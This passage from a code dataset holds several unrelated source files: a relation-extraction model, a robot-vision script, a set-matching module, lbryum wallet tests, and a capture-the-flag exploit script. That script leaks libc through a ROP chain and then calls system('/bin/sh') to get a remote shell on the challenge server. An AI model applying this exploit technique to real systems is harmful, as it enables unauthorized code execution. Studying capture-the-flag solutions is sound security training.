1:0,\n 2:0,\n 3:0,\n 4:0,\n 5:0,\n 6:0,\n 7:0,\n 8:0,\n 9:0\n}\nA, B, C = map(int, input().split())\nresult = list(str(A * B * C))\nfor i in range(10):\n temp[i] = int(result.count(str(i)))\nprint(temp)","repo_name":"seohyeon1578/python-programming","sub_path":"수행평가준비/example9.py","file_name":"example9.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70615789265","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom transformers import BertModel\n\nfrom global_config import *\nfrom .hbt import DGCNN_HBT\nfrom utils import sl_loss\n\n\nclass Combine(nn.Module):\n def __init__(self, schema_num, sbj_type_num):\n super(Combine, self).__init__()\n models = []\n model = DGCNN_HBT(schema_num=schema_num, sbj_type_num=sbj_type_num)\n model.load_state_dict(torch.load(ROOT_SAVED_MODEL + 'large/swa_8017.ckpt'))\n for p in model.parameters():\n p.requires_grad = False\n models.append(model)\n model = DGCNN_HBT(schema_num=schema_num, sbj_type_num=sbj_type_num)\n model.load_state_dict(torch.load(ROOT_SAVED_MODEL + 'large/swa_8012.ckpt'))\n for p in model.parameters():\n p.requires_grad = False\n models.append(model)\n self.models = nn.ModuleList(models)\n self.sbj_linear = nn.Sequential(nn.Linear(sbj_type_num * len(models) * 2, sbj_type_num * len(models) * 2),\n nn.Linear(sbj_type_num * len(models) * 2, sbj_type_num * 2))\n self.obj_linear = nn.Sequential(nn.Linear(schema_num * len(models) * 2, schema_num * len(models) * 2),\n nn.Linear(schema_num * len(models) * 2, schema_num * 2))\n self.word_linear = nn.Sequential(nn.Linear(len(models), len(models)),\n nn.Linear(len(models), 1))\n self.point_threshold = 0.5\n self.sbj_type_num = sbj_type_num\n self.schema_num = schema_num\n\n def forward(self, inputs):\n texts, texts_mask, text_select_indices, sbj_masks, w2vs, hands = inputs\n text_vecs = []\n word_vecs = []\n sbj_points_list = []\n sbj_inputs = [texts, texts_mask, w2vs, hands]\n for model in self.models:\n text_vec, word_pred, sbj_points = model.predicate_1(sbj_inputs)\n text_vec = text_vec.detach()\n word_pred = word_pred.detach()\n sbj_points = sbj_points.detach()\n text_vecs.append(text_vec)\n word_vecs.append(word_pred)\n sbj_points_list.append(sbj_points)\n\n sbj_points = torch.cat(sbj_points_list, dim=1).permute(0,2,1)\n word_pred = torch.stack(word_vecs, dim=2)\n sbj_points = nn.functional.sigmoid(self.sbj_linear(sbj_points).permute(0,2,1))\n word_pred = nn.functional.sigmoid(self.word_linear(word_pred).squeeze(dim=2))\n\n obj_points_list = []\n for text_vec, model in zip(text_vecs, self.models):\n obj_points = model.predicate_2(text_vec, texts_mask, text_select_indices, sbj_masks)\n obj_points = obj_points.detach()\n obj_points_list.append(obj_points)\n obj_points = torch.cat(obj_points_list, dim=1).permute(0,2,1)\n obj_points = nn.functional.sigmoid(self.obj_linear(obj_points).permute(0,2,1))\n return [sbj_points, obj_points, word_pred]\n\n def calculate_loss(self, preds, y_trues, mask, texts_select_indices):\n sbj_pred = preds[0]\n obj_pred = preds[1]\n word_pred = preds[2]\n\n sbj_true = y_trues[0]\n obj_true = y_trues[1]\n word_true = y_trues[2]\n\n A = -8\n a = 0.5\n b = 1\n c = 2\n # sbj loss\n sbj_mask = mask.unsqueeze(dim=1)\n sbj_mask_1 = sbj_mask * sbj_true\n sbj_mask_0 = sbj_mask * (1 - sbj_mask_1)\n sbj_loss = sl_loss(sbj_pred, sbj_true, A, a, b)\n # sbj_loss = sbj_loss * sbj_mask\n sbj_loss_0 = sbj_loss * sbj_mask_0\n sbj_loss_1 = sbj_loss * sbj_mask_1\n sum_0 = sbj_mask_0.sum()\n sum_1 = sbj_mask_1.sum()\n sbj_loss_0 = sbj_loss_0.sum().div(sum_0)\n sbj_loss_1 = sbj_loss_1.sum().div(sum_1)\n rate_0 = (sum_0 + sum_1 - sum_1 * c) / (sum_0 + sum_1)\n sbj_loss = sbj_loss_0 * rate_0 + sbj_loss_1 * (1 - rate_0)\n\n # obj loss\n obj_mask = torch.index_select(mask, 0, texts_select_indices).unsqueeze(dim=1)\n obj_loss = sl_loss(obj_pred, obj_true, A, a, b)\n obj_mask_1 = obj_mask * obj_true\n obj_mask_0 = obj_mask * (1 - obj_mask_1)\n obj_loss_0 = obj_loss * obj_mask_0\n obj_loss_1 = obj_loss * obj_mask_1\n sum_0 = obj_mask_0.sum()\n sum_1 = obj_mask_1.sum()\n obj_loss_0 = obj_loss_0.sum().div(sum_0)\n obj_loss_1 = obj_loss_1.sum().div(sum_1)\n rate_0 = (sum_0 + sum_1 - sum_1 * c) / (sum_0 + sum_1)\n obj_loss = obj_loss_0 * rate_0 + obj_loss_1 * (1 - rate_0)\n\n # word loss\n word_loss = sl_loss(word_pred, word_true, A, a, b)\n word_loss = word_loss * mask\n word_loss = word_loss.sum().div(mask.sum())\n\n loss = sbj_loss + obj_loss * 2.5 + word_loss * 0.015\n return loss\n\n def evaluate(self, inputs, raw_text):\n texts, texts_mask, text_select_indices, sbj_masks, w2vs, hands = inputs\n text_vecs = []\n word_vecs = []\n sbj_points_list = []\n\n sbj_inputs = [texts, texts_mask, w2vs, hands]\n for model in self.models:\n text_vec, word_pred, sbj_points = model.predicate_1(sbj_inputs)\n text_vecs.append(text_vec)\n word_vecs.append(word_pred)\n sbj_points_list.append(sbj_points)\n\n sbj_points = torch.cat(sbj_points_list, dim=1).permute(0,2,1)\n word_pred = torch.stack(word_vecs, dim=2)\n sbj_points = nn.functional.sigmoid(self.sbj_linear(sbj_points).permute(0,2,1))\n word_pred = nn.functional.sigmoid(self.word_linear(word_pred).squeeze(dim=2))\n\n obj_points_list = []\n for text_vec, model in zip(text_vecs, self.models):\n obj_points = model.predicate_2(text_vec, texts_mask, text_select_indices, sbj_masks)\n obj_points_list.append(obj_points)\n obj_points = torch.cat(obj_points_list, dim=1).permute(0,2,1)\n obj_points = nn.functional.sigmoid(self.obj_linear(obj_points).permute(0,2,1))\n\n model = self.models[0]\n sbj_masks, text_select_indices, sbj_entities, sbj_entities_point = model.predicate_1_1(text_vecs[0], sbj_points,\n word_pred, raw_text)\n eval_obj_points_list = []\n for text_vec, model in zip(text_vecs, self.models):\n eval_obj_points = model.predicate_2(text_vec, texts_mask, text_select_indices, sbj_masks)\n eval_obj_points_list.append(eval_obj_points)\n eval_obj_points = torch.cat(eval_obj_points_list, dim=1).permute(0,2,1)\n eval_obj_points = nn.functional.sigmoid(self.obj_linear(eval_obj_points).permute(0,2,1))\n spo_list = model.predicate_2_2(eval_obj_points, text_select_indices, word_pred, sbj_entities,\n sbj_entities_point, raw_text)\n\n return [sbj_points, obj_points, word_pred], spo_list\n\n def predicate(self, inputs, raw_text):\n texts, texts_mask, w2vs, hands = inputs\n text_vecs = []\n word_vecs = []\n sbj_points_list = []\n\n sbj_inputs = [texts, texts_mask, w2vs, hands]\n for model in self.models:\n text_vec, word_pred, sbj_points = model.predicate_1(sbj_inputs)\n text_vecs.append(text_vec)\n word_vecs.append(word_pred)\n sbj_points_list.append(sbj_points)\n\n sbj_points = torch.cat(sbj_points_list, dim=1).permute(0,2,1)\n word_pred = torch.stack(word_vecs, dim=2)\n sbj_points = nn.functional.sigmoid(self.sbj_linear(sbj_points).permute(0,2,1))\n word_pred = nn.functional.sigmoid(self.word_linear(word_pred).squeeze(dim=2))\n\n model = self.models[0]\n sbj_masks, text_select_indices, sbj_entities, sbj_entities_point = model.predicate_1_1(text_vecs[0], sbj_points,\n word_pred, raw_text)\n obj_points_list = []\n for text_vec, model in zip(text_vecs, self.models):\n obj_points = model.predicate_2(text_vec, texts_mask, text_select_indices, sbj_masks)\n obj_points_list.append(obj_points)\n obj_points = torch.cat(obj_points_list, dim=1).permute(0,2,1)\n obj_points = nn.functional.sigmoid(self.obj_linear(obj_points).permute(0,2,1))\n spo_point_list = model.predicate_2_2(obj_points, text_select_indices, word_pred, sbj_entities,\n sbj_entities_point, raw_text)\n return spo_point_list\n\n def find_entities(self, text_line, ps, pe, ps_limit_map, pe_limit_map):\n def is_cross_point(a_point, entities_points):\n start_in_flag = False\n end_in_flag = False\n for e_index in range(len(entities_points)):\n for p_index in range(len(entities_points[e_index])):\n if not start_in_flag and entities_points[e_index][p_index][0] < a_point[0] <= \\\n entities_points[e_index][p_index][1]:\n start_in_flag = True\n elif not end_in_flag and entities_points[e_index][p_index][0] <= a_point[1] < \\\n entities_points[e_index][p_index][1]:\n end_in_flag = True\n if start_in_flag and end_in_flag:\n return True\n return False\n\n entities_line = []\n entities_point_line = []\n seq_length = len(text_line)\n start_index = -999\n end_index = 999\n ps_map = np.zeros(seq_length, dtype=np.int)\n pe_map = np.zeros(seq_length, dtype=np.int)\n start_list = []\n end_list = []\n for index in range(seq_length):\n if ps[index]:\n start_index = index\n start_list.append(start_index)\n if pe[seq_length - index - 1]:\n end_index = seq_length - index - 1\n end_list.append(end_index)\n ps_map[index] = start_index\n pe_map[seq_length - index - 1] = end_index\n\n for start_index in start_list:\n end_index = pe_map[start_index]\n if end_index != 999:\n if end_index - start_index > 10:\n if pe_map[start_index] > pe_limit_map[start_index] and pe_limit_map[\n start_index] - start_index > 2:\n end_index = pe_limit_map[start_index]\n pass\n else:\n # self.start_num += 1\n # print('only start', self.start_num)\n continue\n entity = text_line[start_index:end_index + 1]\n entity_point = (start_index, end_index)\n try:\n entity_index = entities_line.index(entity)\n if entity_point not in entities_point_line[entity_index]:\n entities_point_line[entity_index].append(entity_point)\n except ValueError:\n entities_line.append(entity)\n entities_point_line.append([entity_point])\n\n for end_index in end_list:\n start_index = ps_map[end_index]\n if start_index != -999:\n if end_index - start_index > 10:\n if ps_map[end_index] < ps_limit_map[end_index] and end_index - ps_limit_map[end_index] > 2:\n start_index = ps_limit_map[end_index]\n pass\n else:\n # self.end_num += 1\n # print('only end', self.end_num)\n continue\n entity = text_line[start_index:end_index + 1]\n entity_point = (start_index, end_index)\n try:\n entity_index = entities_line.index(entity)\n if entity_point not in entities_point_line[entity_index]:\n entities_point_line[entity_index].append(entity_point)\n except ValueError:\n entities_line.append(entity)\n entities_point_line.append([entity_point])\n\n new_entities_line = []\n new_entities_point_line = []\n for entity_index in range(len(entities_point_line)):\n for point in entities_point_line[entity_index][:]:\n if is_cross_point(point, entities_point_line):\n del (entities_point_line[entity_index][entities_point_line[entity_index].index(point)])\n if len(entities_point_line[entity_index]) > 0:\n new_entities_line.append(entities_line[entity_index])\n new_entities_point_line.append(entities_point_line[entity_index])\n # else:\n # print(entities_line[entity_index])\n # print('cross')\n\n return new_entities_line, new_entities_point_line\n # return entities_line, entities_point_line\n\n def find_sbj_entities(self, raw_text, points, words):\n points = points.cpu().numpy()\n words = words.cpu().numpy()\n points = points > self.point_threshold\n words = words > self.point_threshold\n entities = []\n entities_point = []\n\n for batch_index in range(points.shape[0]):\n entities_line = []\n entities_point_line = []\n word_line = words[batch_index]\n start_index = -999\n end_index = 999\n seq_len = len(word_line)\n ps_limit_map = np.zeros(seq_len, dtype=np.int)\n pe_limit_map = np.zeros(seq_len, dtype=np.int)\n for index in range(seq_len):\n if word_line[index]:\n if start_index == -999:\n start_index = index\n else:\n start_index = -999\n if word_line[seq_len - index - 1]:\n if end_index == 999:\n end_index = seq_len - index - 1\n else:\n end_index = 999\n pe_limit_map[seq_len - index - 1] = end_index\n ps_limit_map[index] = start_index\n\n for sbj_type_index in range(self.sbj_type_num):\n eee, ppp = self.find_entities(raw_text[batch_index], points[batch_index][sbj_type_index],\n points[batch_index][sbj_type_index + self.sbj_type_num],\n ps_limit_map, pe_limit_map)\n for eeee, pppp in zip(eee, ppp):\n if eeee not in entities_line:\n entities_line.append(eeee)\n entities_point_line.append(pppp)\n\n entities.append(entities_line)\n entities_point.append(entities_point_line)\n return entities, entities_point\n\n def find_obj_entities(self, raw_text, points, text_indices, words):\n points = points.cpu().numpy()\n words = words.cpu().numpy()\n points = points > self.point_threshold\n words = words > self.point_threshold\n entities = [[] for _ in range(len(raw_text))]\n entities_point = [[] for _ in range(len(raw_text))]\n\n for point_index in range(points.shape[0]):\n batch_index = text_indices[point_index]\n entities_line = []\n entities_point_line = []\n word_line = words[batch_index]\n start_index = -999\n end_index = 999\n seq_len = len(word_line)\n ps_limit_map = np.zeros(seq_len, dtype=np.int)\n pe_limit_map = np.zeros(seq_len, dtype=np.int)\n for index in range(seq_len):\n if word_line[index]:\n if start_index == -999:\n start_index = index\n else:\n start_index = -999\n if word_line[seq_len - index - 1]:\n if end_index == 999:\n end_index = seq_len - index - 1\n else:\n end_index = 999\n pe_limit_map[seq_len - index - 1] = end_index\n ps_limit_map[index] = start_index\n for schema_index in range(self.schema_num):\n eee, ppp = self.find_entities(raw_text[batch_index], points[point_index][schema_index],\n points[point_index][schema_index + self.schema_num],\n ps_limit_map, pe_limit_map)\n entities_line.append(eee)\n entities_point_line.append(ppp)\n\n entities[batch_index].append(entities_line)\n entities_point[batch_index].append(entities_point_line)\n return entities, entities_point\n\n def get_spo_list(self, sbj_entities, obj_entities, sbj_entities_point=None, obj_entities_point=None):\n spo_list = []\n spo_point_list = []\n for batch_index in range(len(sbj_entities)):\n spo_list.append([])\n spo_point_list.append([])\n for sbj_index in range(len(sbj_entities[batch_index])):\n for schema_index in range(self.schema_num):\n for obj_index in range(len(obj_entities[batch_index][sbj_index][schema_index])):\n spo_list[batch_index].append([sbj_entities[batch_index][sbj_index],\n schema_index,\n obj_entities[batch_index][sbj_index][schema_index][\n obj_index]])\n if sbj_entities_point is not None:\n spo_point_list[batch_index].append([sbj_entities_point[batch_index][sbj_index],\n schema_index,\n obj_entities_point[batch_index][sbj_index][\n schema_index]\n [obj_index]])\n return spo_list, spo_point_list\n\n def calculate_train_f1(self, raw_text, preds, y_trues, text_select_indices):\n sbj_points = preds[0]\n obj_points = preds[1]\n word_pred = preds[2]\n\n sbj_entities_true = y_trues[0]\n spo_true = y_trues[1]\n\n sbj_entities_pred, _ = self.find_sbj_entities(raw_text, sbj_points, word_pred)\n obj_entities_pred, _ = self.find_obj_entities(raw_text, obj_points, text_select_indices, word_pred)\n spo_pred, _ = self.get_spo_list(sbj_entities_true, obj_entities_pred)\n\n sbj_correct_num = sbj_pred_num = sbj_true_num = 0\n for batch_index in range(len(sbj_entities_pred)):\n for sbj in sbj_entities_pred[batch_index]:\n if sbj in sbj_entities_true[batch_index]:\n sbj_correct_num += 1\n sbj_pred_num += len(sbj_entities_pred[batch_index])\n sbj_true_num += len(sbj_entities_true[batch_index])\n\n spo_correct_num = spo_pred_num = spo_true_num = 0\n for batch_index in range(len(spo_pred)):\n for spo in spo_pred[batch_index]:\n if spo in spo_true[batch_index]:\n spo_correct_num += 1\n spo_pred_num += len(spo_pred[batch_index])\n spo_true_num += len(spo_true[batch_index])\n\n return [sbj_correct_num, sbj_pred_num, sbj_true_num], [spo_correct_num, spo_pred_num, spo_true_num]","repo_name":"BaberMuyu/relation-extraction","sub_path":"model/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":19349,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"48"} +{"seq_id":"15729090215","text":"import numpy as np\nimport cv2\nfrom settings import BoltSettings\n\n__author__ = 'Karl'\n\n\nclass GetCoordinates:\n\n\tdef __init__(self):\n\t\tpass\n\n\t@staticmethod\n\tdef get_coordinates():\n\n\t\t# Load Global Settings\n\t\tst = BoltSettings()\n\t\tsettings_dict = st.read_dict()\n\n\t\tcap = cv2.VideoCapture(0)\n\n\t\tret, frame = cap.read()\n\n\t\tif not ret:\n\t\t\tprint(\"No image\")\n\t\t\tprint(frame)\n\t\t\treturn {\"ball\": -1, \"blue\": -1, \"yellow\": -1, \"black\": -1}\n\n\t\thsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\t\tcolours = [\"black\", \"blue\", \"yellow\", \"ball\"]\n\t\tcoordinates_dict = {\"ball\": -1, \"blue\": -1, \"yellow\": -1, \"black\": -1}\n\n\t\tfor i in range(4):\n\t\t\tcolour = colours[i]\n\t\t\th_low = int(settings_dict['H_low_' + colour])\n\t\t\th_top = int(settings_dict['H_top_' + colour])\n\t\t\ts_low = int(settings_dict['S_low_' + colour])\n\t\t\ts_top = int(settings_dict['S_top_' + colour])\n\t\t\tv_low = int(settings_dict['V_low_' + colour])\n\t\t\tv_top = int(settings_dict['V_top_' + colour])\n\n\t\t\tlower_colour = np.array([h_low, s_low, v_low])\n\t\t\tupper_colour = np.array([h_top, s_top, v_top])\n\t\t\tmask = cv2.inRange(hsv, lower_colour, upper_colour)\n\n\t\t\tkernel = np.ones((10, 10), np.uint8)\n\n\t\t\t# combining smaller blobs\n\t\t\tdilated = cv2.dilate(mask, kernel, iterations=2)\n\n\t\t\t# Detect blobs.\n\t\t\t_, contours, _ = cv2.findContours(dilated, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n\n\t\t\t# Getting the biggest blob's coordinates (that is probably the closest object)\n\t\t\tbiggest_area = 0\n\t\t\tcoordinates = -1\n\t\t\tfor cnt in contours:\n\t\t\t\t# width = cv2.contourArea(cnt)\n\t\t\t\trect = cv2.minAreaRect(cnt)\n\t\t\t\twidth = rect[1][0]\n\t\t\t\theight = rect[1][1]\n\t\t\t\tarea = width * height\n\n\t\t\t\tif width < 5 and (colour == \"yellow\" or colour == \"blue\"):\n\t\t\t\t\tcontinue\n\n\t\t\t\tif area > biggest_area:\n\t\t\t\t\tmoment = cv2.moments(cnt)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcx = int(moment['m10']/moment['m00'])\n\t\t\t\t\t\tcy = int(moment['m01']/moment['m00'])\n\t\t\t\t\texcept ZeroDivisionError:\n\t\t\t\t\t\tprint(\"zero division\")\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tbiggest_area = area\n\t\t\t\t\tif colour == \"ball\":\n\t\t\t\t\t\tblack = coordinates_dict[\"black\"]\n\t\t\t\t\t\t# print(\"black: \" + str(black))\n\t\t\t\t\t\t# print(\"ball: \" + str(cx) + \", \" + str(cy))\n\t\t\t\t\t\tif black != -1:\n\t\t\t\t\t\t\tblack_x = black[0]\n\t\t\t\t\t\t\tblack_y = black[1]\n\t\t\t\t\t\t\tblack_width = black[2]\n\t\t\t\t\t\t\tif black_y > cy and black_x + black_width / 2 > cx > black_width / 2 - black_x: # ball is out of the field\n\t\t\t\t\t\t\t\tprint(\"ball out of field\")\n\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tcoordinates = (cx, cy, width, height)\n\t\t\tcoordinates_dict[colour] = coordinates\n\n\t\tcap.release()\n\n\t\treturn coordinates_dict\n","repo_name":"Karl-Mattias/Robotics2015","sub_path":"get_coordinates.py","file_name":"get_coordinates.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74012619024","text":"from typing import Tuple\n\n# import lap\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom fdsa.utils.gale_shapley import GaleShapley\nfrom scipy.optimize import linear_sum_assignment\n\n\nclass MapperSetsAE(nn.Module):\n \"\"\"Mapping Algorithm for Sets AutoEncoder.\"\"\"\n\n def __init__(\n self,\n matcher='HM',\n p: int = 2,\n device: torch.device = torch.\n device('cuda' if torch.cuda.is_available() else 'cpu')\n ) -> None:\n \"\"\"Constructor.\n\n Args:\n matcher (string): The matching algorithm to use.\n One of 'HM' (Munkres version of the Hungarian algorithm),\n or 'GS' (Gale-Shapley algorithm).\n Defaults to 'HM'.\n p (int, optional): the p-norm to use when calculating the\n cost matrix. Defaults to 2.\n device (torch.device): Device on which to run the model.\n Defaults to CPU.\n \"\"\"\n super(MapperSetsAE, self).__init__()\n self.p = p\n self.matcher = matcher\n self.method = dict(\n {\n 'HM': self.get_assignment_matrix_hm,\n 'GS': self.get_assignment_matrix_gs\n }\n )\n\n self.device = device\n\n def get_assignment_matrix_hm(self, cost_matrix: torch.Tensor) -> torch.Tensor:\n \"\"\"Runs the Munkres version of the Hungarian algorithm.\n\n Args:\n cost_matrix (torch.Tensor): A 2-D tensor that represents the cost\n of matching a row (input) and column (output). Has dimensions\n N x M, where N is the length of inputs and M the length of\n outputs.\n\n Returns:\n Tuple: Tuple of 2-D binary matrix with the same dimensions as the\n cost matrix, where 1 represents a match and 0 otherwise, and\n row-wise nonzero indices of the matrix.\n \"\"\"\n matrix = torch.zeros_like(cost_matrix)\n rows, cols = linear_sum_assignment(cost_matrix.detach().cpu().numpy())\n matrix[rows, cols] = 1\n\n return torch.as_tensor(matrix), cols\n\n # def get_assignment_matrix_vj(\n # self, cost_matrix: torch.Tensor\n # ) -> torch.Tensor:\n # \"\"\"Runs the Jonker-Volgenant algorithm.\n\n # Args:\n # cost_matrix (torch.Tensor): A 2-D tensor that represents the cost\n # of matching a row (input) and column (output). Has dimensions\n # N x M, where N is the length of inputs and M the length of\n # outputs.\n\n # Returns:\n # Tuple: Tuple of 2-D binary matrix with the same dimensions as the\n # cost matrix, where 1 represents a match and 0 otherwise, and\n # row-wise nonzero indices of the matrix.\n # \"\"\"\n # matrix = torch.zeros_like(cost_matrix)\n # cost, cols, rows = lap.lapjv(\n # cost_matrix.detach().cpu().numpy(), extend_cost=True\n # )\n # matrix[range(len(cols)), cols] = 1\n\n # return torch.as_tensor(matrix), cols\n\n def get_assignment_matrix_gs(self, cost_matrix: torch.Tensor) -> torch.Tensor:\n \"\"\"Runs the Gale-Shapley Stable Marriage algorithm.\n\n Args:\n cost_matrix (torch.Tensor): A 2-D tensor that represents the cost\n of matching a row (input) and column (output). Has dimensions\n N x M, where N is the length of inputs and M the length of\n outputs.\n\n Returns:\n Tuple: Tuple of 2-D binary matrix with the same dimensions as the\n cost matrix, where 1 represents a match and 0 otherwise, and\n row-wise nonzero indices of the matrix.\n \"\"\"\n\n gs = GaleShapley(cost_matrix.size()[0], cost_matrix.size()[1])\n binary_matrix = gs.compute(cost_matrix)\n rows, cols = np.nonzero(binary_matrix)\n return binary_matrix, cols\n\n def output_mapping(\n self, outputs: torch.Tensor, match_matrix: torch.Tensor\n ) -> torch.Tensor:\n \"\"\"Orders the outputs based on the match matrix.\n\n Args:\n outputs (torch.Tensor): The set of outputs generated by the decoder.\n match_matrix (torch.Tensor): A 2-D binary matrix, where 1\n represents a match and 0 otherwise.\n Has the same dimensions as the cost matrix.\n Returns:\n torch.Tensor: Outputs ordered in correspondence with inputs.\n \"\"\"\n return (match_matrix[..., None] * outputs[None, ...]).sum(dim=1)\n\n def forward(\n self, inputs: torch.Tensor, stacked_outputs: torch.Tensor,\n member_probabilities: torch.Tensor\n ) -> Tuple:\n \"\"\"Computes cost matrix and performs a matching between inputs and outputs.\n\n Args:\n inputs (torch.Tensor): Input tensor of shape\n [batch_size x sequence_length x input_size].\n stacked_outputs (torch.Tensor): Reconstructed elements from the\n decoder with shape [batch_size, max_length, input_size].\n member_probabilities (torch.Tensor): Probabilities describing the\n likelihood of elements belonging to the set.\n\n Returns:\n Tuple: Tuple of the outputs and their membership probabilities\n reordered with respect to the input.\n \"\"\"\n\n in_batch_size, input_length, input_size = inputs.size()\n out_batch_size, output_length, output_size = stacked_outputs.size()\n mapped_outputs = []\n\n with torch.no_grad():\n cost_matrices = list(\n map(torch.cdist, inputs, stacked_outputs, [self.p] * in_batch_size)\n )\n\n match_matrices, cols = map(\n list, zip(*map(self.method[self.matcher], cost_matrices))\n )\n\n mapped_outputs = list(map(self.output_mapping, stacked_outputs, match_matrices))\n\n mapped_prob = list(\n map(self.output_mapping, member_probabilities, match_matrices)\n )\n\n return torch.stack(mapped_outputs), torch.stack(mapped_prob), np.stack(cols)\n","repo_name":"PaccMann/fdsa","sub_path":"fdsa/utils/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":6095,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"34126037868","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom pwn import *\n\nexe = context.binary = ELF('./xored')\n\nhost = args.HOST or 'io.ept.gg'\nport = int(args.PORT or 30012)\n\ndef start_local(argv=[], *a, **kw):\n '''Execute the target binary locally'''\n if args.GDB:\n return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)\n else:\n return process([exe.path] + argv, *a, **kw)\n\ndef start_remote(argv=[], *a, **kw):\n '''Connect to the process on the remote host'''\n io = connect(host, port)\n if args.GDB:\n gdb.attach(io, gdbscript=gdbscript)\n return io\n\ndef start(argv=[], *a, **kw):\n '''Start the exploit against the target.'''\n if args.LOCAL:\n return start_local(argv, *a, **kw)\n else:\n return start_remote(argv, *a, **kw)\n\ngdbscript = '''\nb *main\nb *main+394\n\ncontinue\n'''.format(**locals())\nlibc = ELF('./libc.so.6')\n# -- Exploit goes here --\nfrom itertools import cycle\ndef xorpayload(payload):\n key = b'KuCOLc5PIH3mgP6nJxF3DBHXbDHSqM0Y'\n res = b\"\".join([bytes([(c1^c2)]) for (c1,c2) in zip(payload,cycle(key))])\n return res\nrop = ROP(exe)\nrop.puts(exe.got.fgets)\nrop.call(rop.ret.address)\nrop.main()\nio = start()\n\nio.recvuntil(b'>')\n\npayload = fit({\n 80: rop.chain(),\n 127: b'\\x00',\n 152: p64(0x0401266)\n})\n\nio.send(xorpayload(payload[:-1]))\nio.recvuntil(b':')\nio.recvline()\nleak = u64(io.recvline().strip().ljust(8, b'\\x00'))\nlibc.address = leak - libc.sym.fgets\nprint(f'libc base @ {hex(libc.address)}')\n\nrop2 = ROP(libc)\nrop2.system(next(libc.search(b'/bin/sh\\x00')))\nio.recvuntil(b'>')\n\npayload = fit({\n 80: rop2.chain(), \n 152: p64(0x0401266)\n})\n\nio.sendline(xorpayload(payload))\nio.interactive()\n\n","repo_name":"ept-team/equinor-ctf-2022","sub_path":"writeups/Pwn/xored/EPT/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"25256967924","text":"import unittest\nfrom mock import patch\nfrom StringIO import StringIO\n\nfrom lbryschema.claim import ClaimDict\nfrom lbryschema.signer import SECP256k1\n\nfrom lbryum import main\nfrom lbryum import __version__\nfrom lbryum.errors import NotEnoughFunds\nfrom lbryum.constants import LBRYCRD_MIN_FEE_PER_NAMECLAIM_CHAR, COIN\nfrom lbryum.transaction import Transaction\nfrom test_data import SAMPLE_CLAIMS_FOR_NAME_RESULT, SAMPLE_CLAIMTRIE_GETVALUE_RESULT,\\\n SAMPLE_CLAIMTRIE_GETVALUEFORURI_RESULT, SECP256K1_PRIVATE_KEY\n\nfrom testing import *\n\n\nclass TestMain(unittest.TestCase):\n\n @patch('sys.stdout', new_callable=StringIO)\n def test_main(self, stdout):\n with self.assertRaises(SystemExit):\n main.main([\"version\", \"-D\", \".\"])\n self.assertEqual(stdout.getvalue().strip(), '\"'+__version__+'\"')\n\n\nclass TestMiscCommands(unittest.TestCase):\n\n seed_text = (\n \"travel nowhere air position hill peace suffer parent beautiful\"\n \"rise blood power home crumble teach\"\n )\n password = \"secret\"\n\n def test_commands(self):\n cmds = MocCommands()\n self.assertEqual(\n 96, len(cmds.commands().split())\n )\n\n def test_get_parser(self):\n parser = commands.get_parser()\n self.assertIn('lbryum help', parser.format_help())\n\n def test_locked(self):\n cmds = MocCommands()\n self.assertEqual(False, cmds.locked)\n cmds.wallet.use_encryption = True\n self.assertEqual(True, cmds.locked)\n cmds._password = 'foo'\n self.assertEqual(False, cmds.locked)\n\n def test_lock_unlock(self):\n cmds = MocCommands()\n self.assertEqual(False, cmds.locked)\n\n # unlocking an already unlocked wallet\n cmds.wallet.use_encryption = False\n cmds.unlock_wallet(self.password)\n self.assertEqual(False, cmds.locked)\n cmds._password = self.password\n cmds.unlock_wallet(self.password)\n self.assertEqual(False, cmds.locked)\n\n # lock wallet\n cmds.lock_wallet()\n cmds.wallet.use_encryption = True\n self.assertEqual(True, cmds.locked)\n\n # unlock a genuinely locked wallet\n cmds.wallet.add_seed(self.seed_text, self.password)\n cmds.wallet.create_master_keys(self.password)\n cmds.unlock_wallet(self.password)\n self.assertEqual(False, cmds.locked)\n\n def test_decrypt_wallet(self):\n cmds = MocCommands()\n cmds.wallet.add_seed(self.seed_text, self.password)\n cmds.wallet.create_master_keys(self.password)\n cmds._password = self.password\n\n cmds.wallet.use_encryption = False\n cmds.decrypt_wallet()\n self.assertEqual(0, cmds.wallet.storage.write_called)\n\n cmds.wallet.use_encryption = True\n cmds.decrypt_wallet()\n self.assertEqual(1, cmds.wallet.storage.write_called)\n\n def test_update_password(self):\n cmds = MocCommands()\n\n cmds.update_password(None)\n self.assertEqual(cmds._password, None)\n\n cmds.wallet.use_encryption = True\n cmds.wallet.add_seed(self.seed_text, self.password)\n cmds.wallet.create_master_keys(self.password)\n cmds._password = self.password\n cmds.update_password('foo')\n self.assertEqual(cmds._password, 'foo')\n self.assertTrue(cmds._keyring.set_password_called)\n\n cmds._keyring = None\n with self.assertRaises(ValueError):\n cmds.update_password('foo')\n\n self.assertEqual({'password': True}, cmds.password())\n\n\nclass TestImportExportCertificateInfoCommand(unittest.TestCase):\n\n def _make_claim_tx_key(self, cmds):\n claim = ClaimDict.generate_certificate(SECP256K1_PRIVATE_KEY, curve=SECP256k1)\n cmds.wallet.add_address_transaction(4003002001000)\n tx = cmds.wallet.add_claim_transaction('lbry://@test', 1000, claim.serialized)\n\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsbyids': lambda _: {\n tx.get_claim_id(0): cmds.wallet.get_name_claims()[0]\n }\n })\n key = 